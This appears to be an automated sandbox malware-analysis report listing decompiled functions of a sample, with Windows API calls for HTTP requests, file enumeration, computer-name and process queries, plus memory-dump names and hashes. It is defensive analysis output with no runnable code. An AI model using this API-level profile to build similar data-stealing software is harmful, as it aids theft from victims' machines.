Function 004747B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849

Strings

<, xrefs: 004747C9

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 00712f95e145abe199289d1497ef23af860f3b2ca73dcb267bdec721ae7b8268
Instruction ID: 82ab199545416e96a3f51836d500ecb92b75d69c6c94f67e8b3eaceaa17e0f5e
Opcode Fuzzy Hash: 00712f95e145abe199289d1497ef23af860f3b2ca73dcb267bdec721ae7b8268
Instruction Fuzzy Hash: 5D216FB1D00208ABDF14EFA5E845ADE7B75FB04320F10862AF919A72C0EB746A05CF91

Function 004851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 00476280: InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
Part of subcall function 00476280: StrCmpCA.SHLWAPI(?,0110E8F8), ref: 00476303
Part of subcall function 00476280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
Part of subcall function 00476280: HttpOpenRequestA.WININET(00000000,GET,?,0110E278,00000000,00000000,00400100,00000000), ref: 00476385
Part of subcall function 00476280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
Part of subcall function 00476280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485228

Strings

ERROR, xrefs: 0048521A
ERROR, xrefs: 00485273

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 68394b0f972cebbee60df293262e273e1c426ab8e9ee640bd2bf176549a0f73f
Instruction ID: 0174d4b3077bb314ac40494ad62e481b3a60c2e7b88d0570749c3362a3f06e02
Opcode Fuzzy Hash: 68394b0f972cebbee60df293262e273e1c426ab8e9ee640bd2bf176549a0f73f
Instruction Fuzzy Hash: 73117730800008A7DB08FF65DD52AED3338AF40304F40495FF80A56592EF7CAB15CB6A

Function 00484F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

lstrcat.KERNEL32(?,00000000), ref: 00484F7A
lstrcat.KERNEL32(?,00491070), ref: 00484F97
lstrcat.KERNEL32(?,011091A8), ref: 00484FAB
lstrcat.KERNEL32(?,00491074), ref: 00484FBD

Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943

Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
Part of subcall function 00484910: FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
Part of subcall function 00484910: FindClose.KERNEL32(000000FF), ref: 00484B92

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 4039bda5b4d02d281ed111e3aae9a700832e5d9389e9ffe656ece046feedafd3
Instruction ID: a0b9ad99205540e9752abc56d170f53deb8b1724c8429163fc184b54aa626bba
Opcode Fuzzy Hash: 4039bda5b4d02d281ed111e3aae9a700832e5d9389e9ffe656ece046feedafd3
Instruction Fuzzy Hash: 1521DDF69002046BCB54F7B0DC46FED337DA794300F40469EB64992191EE7997C88BA6

Function 00480740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01109108), ref: 0048079A
StrCmpCA.SHLWAPI(00000000,01109118), ref: 00480866
StrCmpCA.SHLWAPI(00000000,01109138), ref: 0048099D

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 90f0d5ba0038f8b13e7d0f43ae3f71642f905b5b4c3f9b17e31a9bca5a72ccd3
Instruction ID: db3100344210c03b894a361b0abd23a3d6fa520668e80100d354012ff8358864
Opcode Fuzzy Hash: 90f0d5ba0038f8b13e7d0f43ae3f71642f905b5b4c3f9b17e31a9bca5a72ccd3
Instruction Fuzzy Hash: BC91B975A101089FDB28FF65D991BED77B5FF94304F00851EE8098F241DB38AA09CB96

Function 00480765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01109108), ref: 0048079A
StrCmpCA.SHLWAPI(00000000,01109118), ref: 00480866
StrCmpCA.SHLWAPI(00000000,01109138), ref: 0048099D

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 27719e3e81fb71b37e62edb092dff51856f983464e2b557f091cb4a66f203960
Instruction ID: 0c93f366920985d91bc49b4c88217952a0a43a471f7b8d4af3a5bfbb218dc8b6
Opcode Fuzzy Hash: 27719e3e81fb71b37e62edb092dff51856f983464e2b557f091cb4a66f203960
Instruction Fuzzy Hash: 9181B975B102049FDB18FF65C991AEDB7B6FF94304F10851EE8099F241DB34AA06CB96

Function 004878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
RtlAllocateHeap.NTDLL(00000000), ref: 00487917
GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 26c3296a272dae15783e17672e176f0e250ccb049e8dd49008aa80d08af483b6
Instruction ID: b72455174323a80419cc8abad70bd2410af90d5c145dda18009c7f9560230dab
Opcode Fuzzy Hash: 26c3296a272dae15783e17672e176f0e250ccb049e8dd49008aa80d08af483b6
Instruction Fuzzy Hash: B20186F1944204EFD700DF94DD45BAEBBB8F704B21F20461AF645E3680D37859408BA6

Function 6C5E3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C5E3095

Part of subcall function 6C5E35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C66F688,00001000), ref: 6C5E35D5
Part of subcall function 6C5E35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5E35E0
Part of subcall function 6C5E35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5E35FD
Part of subcall function 6C5E35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5E363F
Part of subcall function 6C5E35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5E369F
Part of subcall function 6C5E35A0: __aulldiv.LIBCMT ref: 6C5E36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5E309F

Part of subcall function 6C605B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6056EE,?,00000001), ref: 6C605B85
Part of subcall function 6C605B50: EnterCriticalSection.KERNEL32(6C66F688,?,?,?,6C6056EE,?,00000001), ref: 6C605B90
Part of subcall function 6C605B50: LeaveCriticalSection.KERNEL32(6C66F688,?,?,?,6C6056EE,?,00000001), ref: 6C605BD8
Part of subcall function 6C605B50: GetTickCount64.KERNEL32 ref: 6C605BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5E30BE

Part of subcall function 6C5E30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C5E3127
Part of subcall function 6C5E30F0: __aulldiv.LIBCMT ref: 6C5E3140

Part of subcall function 6C61AB2A: __onexit.LIBCMT ref: 6C61AB30

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 1c6bba515eccae29ba60f8b322c5cba155f89547a427ef2b92d0ccfdfd8c001c
Instruction ID: 929e9aa9db88df607bc4223a8166881f52d32e19aaf2c2af81128814073ff444
Opcode Fuzzy Hash: 1c6bba515eccae29ba60f8b322c5cba155f89547a427ef2b92d0ccfdfd8c001c
Instruction Fuzzy Hash: 3DF0D662E2474496CB10DF3788912B6B370AFAB214F10671AE844A7621FB2066D883CF

Function 00489470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00489484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004894A5
CloseHandle.KERNEL32(00000000), ref: 004894AF

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd
